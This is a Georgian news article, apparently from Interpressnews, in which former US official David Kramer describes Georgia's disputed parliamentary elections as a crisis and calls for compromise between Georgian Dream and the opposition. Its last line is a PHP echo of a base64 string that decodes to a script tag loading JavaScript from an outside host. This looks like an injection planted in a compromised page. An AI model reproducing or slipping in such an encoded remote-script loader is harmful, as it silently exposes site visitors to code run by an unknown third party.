celsiusi
ავერსი საქკაბელი
დიპლომატიური წარმომადგენლების მხრიდან იყო გარკვეული კომენტარები, რომ საქართველოს ბოლო 30 წლის განმავლობაში რთული არჩევნები ჰქონდა - არსებითად, ისინი ამბობენ: "მერე რა, კიდევ ერთი რომ იყოს?" - ამის შესახებ დემოკრატიისა და ადამიანის უფლებათა მიმართულებით აშშ-ის სახელმწიფო მდივნის ყოფილმა თანაშემწემ, დევიდ კრამერმა „ინტერპრესნიუსთან“ ექსკლუზიურ ინტერვიუში განაცხადა.
 
მან საქართველოში საპარლამენტო არჩევნების შემდეგ შექმნილ ვითარებაზე ისაუბრა და მას პოლიტიკური კრიზისი უწოდა.
 
„ვფიქრობ, საპარლამენტო არჩევნები საკმაოდ პრობლემური იყო. ვიცი, რომ "ქართული ოცნების" და მთავრობის მხარე ცდილობს, არჩევნები მაქსიმალურად საუკეთესო შუქზე წარმოაჩინოს. მათ შეარჩიეს საერთაშორისო დამკვირვებელთა შეფასებების გარკვეული ნაწილები, რომლებშიც არჩევნები დადებითად აისახა. მაგრამ რა თქმა უნდა, ოპოზიციას სულ სხვა შეხედულება აქვს და ასევე, არიან სხვა დამკვირვებლები, როგორც ადგილობრივი, ასევე საერთაშორისო, რომლებიც იზიარებენ კრიტიკას, რომ არჩევნები იდეალურისგან შორს იყო, ისინი წარმოადგენენ ზოგიერთ რეალურ პრობლემას, მათ შორის - "ქართული ოცნების" პროცენტული წილის გაზრდასაც. ოპოზიციამ თქვა, რომ ისინი არ დაიკავებენ ადგილებს ახალ პარლამენტში, თუ ახალი არჩევნები არ ჩატარდება და ცენტრალური საარჩევნო კომისიის თავმჯდომარე არ შეიცვლება. შესაბამისად, საქართველო ფაქტობრივად, ჩიხშია, რაც ძალიან სამწუხაროა. მე "ქართული ოცნების" მხრიდან კომპრომისზე წასვლის დიდ ინტერესს ვერ ვხედავ და ვფიქრობ, რომ კრიზისის მოსაგვარებლად - ჩემი აზრით, ეს სწორედ კრიზისია - ორივე მხარემ უნდა მოძებნოს კომპრომისული სივრცეები“, - აღნიშნა კრამერმა.
 
მან უპასუხა კითხვაზე, როგორ წარმოუდგენია კრიზისის გადაჭრის გზები, რომ მიუხედავად ელჩების მიერ შუამავლობის მცდელობისა, ოპოზიცია და მმართველი პარტია შეთანხმებას ვერ ახერხებენ, ახალი პარლამენტის პირველი სხდომა კი სულ მალე - 11 დეკემბერს უნდა გაიმართოს.
 
„ელჩები ცდილობენ და ჩემი აზრით, მათ უნდა აღიარონ, რომ არჩევნები პრობლემური იყო. ვიცი, რომ დიპლომატიური წარმომადგენლების მხრიდან იყო გარკვეული კომენტარები, რომ საქართველოს ბოლო 30 წლის განმავლობაში რთული არჩევნები ჰქონდა. არსებითად, ისინი ამბობენ: "მერე რა, კიდევ ერთი რომ იყოს?" ჩვენ არ უნდა მივიღოთ კიდევ ერთი ცუდი არჩევნები, თუ ეს ის შეფასებაა, რაც ხალხს აქვს. საბოლოო ჯამში, ეს კრიზისი ქართველებმა უნდა გადაწყვიტონ და არა საერთაშორისო საზოგადოების რომელიმე მოთამაშემ“, - განაცხადა დევიდ კრამერმა.
1628
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");